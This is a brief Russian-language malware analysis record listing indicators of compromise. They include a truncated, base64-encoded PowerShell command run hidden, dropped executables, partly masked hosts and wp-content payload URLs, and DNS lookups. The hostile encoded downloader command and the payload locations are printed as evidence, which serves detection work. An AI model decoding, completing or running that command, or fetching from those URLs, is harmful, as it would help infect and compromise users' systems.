Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAFcARQBJAFkAZgBvAHUAPQAnAEkAVwBPAE4AVgBtAGYAdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYABDAGAAVQByAGAASQBgAFQAWQBQAHIAbwB0AG8AYwBPAGwAIgAgAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1576
- %TEMP%\1122895.cvr
- %HOMEPATH%\357.exe
- %HOMEPATH%\357.exe
- 'vi###style.shop':443
- 'si##.#nquima.com.br':443
- http://sp####za2000.com/wp-content/XnOLQdAmO/
- http://www.sp####za2000.com/wp-content/XnOLQdAmO/
- DNS ASK sp####za2000.com
- DNS ASK ma###ina.com
- DNS ASK vi###style.shop
- DNS ASK si##.#nquima.com.br
- DNS ASK tr#####gs.smartscape.eu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAFcARQBJAFkAZgBvAHUAPQAnAEkAVwBPAE4AVgBtAGYAdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYABDAGAAVQByAGAASQBgAFQAWQBQAHIAbwB0AG8AYwBPAGwAIgAgAD...' (со скрытым окном)